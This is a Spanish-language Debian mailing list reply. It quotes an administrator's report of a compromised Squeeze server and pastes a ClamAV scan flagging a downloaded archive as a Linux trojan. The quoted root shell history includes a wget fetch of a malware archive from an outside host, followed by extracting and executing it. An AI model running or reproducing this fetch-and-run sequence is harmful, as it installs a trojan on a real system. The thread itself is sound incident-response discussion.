El Fri, 13 May 2011 12:39:56 -0300 ciracusa <[email protected]> va dir:
> Lista, buenas tardes. > > Perdón si este tema no esta directamente relacionado con Debian, pero > como el server en cuestión tiene Squeeze y es un tema de seguridad creo > que puede interesarles a mas de uno. > > Ayer viendo el history de root de un servidor veo lo siguiente: > > 314 ./go.sh 189 > 315 w > 316 cd > 317 cd /var/tmp/ > 318 rm -rf gosh > 319 ls -a > 320 exit > 321 cat /proc/cpuinfo > 322 passwd > 323 cd /var/tmp/ > 324 cd gosh > 325 touch bios.txt > 326 chmod +x * > 327 screen > 328 exit > 329 cat /proc/cpuinfo > 330 cd /var/tmp/ > 331 ls -a > 332 wget http://gblteam.webs.com/gosh.tgz.tar > 333 tar zxvf gosh.tgz.tar > 334 rm -rf gosh.tgz.tar > 335 cd gosh > 336 touch bios.txt > 337 chmod +x * > 338 ./go.sh 200 > 339 cd > 340 cd /var/tmp/ > 341 ls -a > 342 rm -rf gosh > 343 ls -a > 344 exit > 345 cd /var/tmp/ > 346 perl x.pl > > > Que opinan? > > Entiendo -lamentablemente- que el server fue comprometido, pero lo que > no llego a comprender es el alcance de esto. > > Notar que puse el link para que puedan descargarlo uds. también y > analizarlo (tomando las precauciones del caso). > > Bueno, si alguien tiene algo de info muy agradecido. > > Y si pueden recomendarme algunos pasos para analizar la seguridad del > server desde ya muchas gracias. > > Salu2. > > $ clamscan gosh.tgz.tar gosh.tgz.tar: Trojan.Linux.RST.b FOUND ----------- SCAN SUMMARY ----------- Known viruses: 971880 Engine version: 0.97 Scanned directories: 0 Scanned files: 1 Infected files: 1 Data scanned: 0.22 MB Data read: 1.57 MB (ratio 0.14:1) Time: 9.874 sec (0 m 9 s) -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected] Archive: http://lists.debian.org/[email protected]

